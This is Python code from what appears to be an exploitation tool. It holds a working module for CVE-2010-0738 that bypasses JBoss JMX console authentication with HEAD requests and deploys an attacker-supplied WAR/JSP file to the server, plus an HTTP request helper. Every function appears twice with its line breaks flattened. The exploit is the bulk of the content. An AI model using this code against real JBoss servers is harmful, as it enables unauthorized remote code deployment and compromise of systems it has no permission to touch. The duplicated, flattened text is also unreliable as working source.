def run(fingerengine, fingerprint): """ This module exploits CVE-2010-0738, which bypasses authentication by submitting requests with different HTTP verbs, such as HEAD. """ utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip, LOG.DEBUG) url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format( fingerengine.options.ip, fingerprint.port) response = utility.requests_head(url) if response.status_code == 200: utility.Msg( "Vulnerable to verb tampering, attempting to deploy...", LOG.SUCCESS) war_file = abspath(fingerengine.options.deploy) war_name = parse_war_path(war_file) tamper = "/jmx-console/HtmlAdaptor?action=invokeOp"\ "&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"\ "&arg0={0}&arg1={1}&arg2=.jsp&arg3={2}&arg4=True".format( war_file.replace('.jsp', '.war'), war_name, quote_plus(open(war_file).read())) response = utility.requests_head(url + tamper) if response.status_code == 200: utility.Msg("Successfully deployed {0}".format(war_file), LOG.SUCCESS) else: utility.Msg( "Failed to deploy (HTTP %d)" % response.status_code, LOG.ERROR)
def run(fingerengine, fingerprint): """ This module exploits CVE-2010-0738, which bypasses authentication by submitting requests with different HTTP verbs, such as HEAD. """ utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip, LOG.DEBUG) url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format(fingerengine.options.ip, fingerprint.port) response = utility.requests_head(url) if response.status_code == 200: utility.Msg("Vulnerable to verb tampering, attempting to deploy...", LOG.SUCCESS) war_file = abspath(fingerengine.options.deploy) war_name = parse_war_path(war_file) tamper = "/jmx-console/HtmlAdaptor?action=invokeOp"\ "&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"\ "&arg0={0}&arg1={1}&arg2=.jsp&arg3={2}&arg4=True".format( war_file.replace('.jsp', '.war'), war_name, quote_plus(open(war_file).read())) response = utility.requests_head(url + tamper) if response.status_code == 200: utility.Msg("Successfully deployed {0}".format(war_file), LOG.SUCCESS) else: utility.Msg("Failed to deploy (HTTP %d)" % response.status_code, LOG.ERROR)
def make_request(method,host,port,ssl,url,data,cookies=None,allow_redirects=True): response = None if port == None and ssl: port = 443 if port == None and not ssl: port = 80 try: url = "{0}://{1}:{2}{3}".format("https" if ssl else "http", host, port,url) if method == 'GET': response = utility.requests_get(url,cookies=cookies) elif method == 'BASIC': response = utility.requests_get(url,cookies=cookies,auth=(data['username'],data['password'])) elif method == 'POST': response = utility.requests_post(url,data,cookies=cookies,allow_redirects=allow_redirects) elif method == 'HEAD': response = utility.requests_head(url,cookies=cookies) elif method == 'PUT': response = utility.requests_put(url,data,cookies=cookies) else: response = utility.requests_other(method,url,cookies=cookies) return response except exceptions.Timeout: utility.Msg("Timeout to {0}:{1}".format(host,port), 'DEBUG') except exceptions.ConnectionError, e: utility.Msg("Connection error to {0} ({1})".format(host,port, e),'DEBUG')
def make_request(method, host, port, ssl, url, data, cookies=None, allow_redirects=True): response = None if port == None and ssl: port = 443 if port == None and not ssl: port = 80 try: url = "{0}://{1}:{2}{3}".format("https" if ssl else "http", host, port, url) if method == 'GET': response = utility.requests_get(url, cookies=cookies) elif method == 'BASIC': response = utility.requests_get(url, cookies=cookies, auth=(data['username'], data['password'])) elif method == 'POST': response = utility.requests_post(url, data, cookies=cookies, allow_redirects=allow_redirects) elif method == 'HEAD': response = utility.requests_head(url, cookies=cookies) elif method == 'PUT': response = utility.requests_put(url, data, cookies=cookies) else: response = utility.requests_other(method, url, cookies=cookies) return response except exceptions.Timeout: utility.Msg("Timeout to {0}:{1}".format(host, port), 'DEBUG') except exceptions.ConnectionError, e: utility.Msg("Connection error to {0} ({1})".format(host, port, e), 'DEBUG')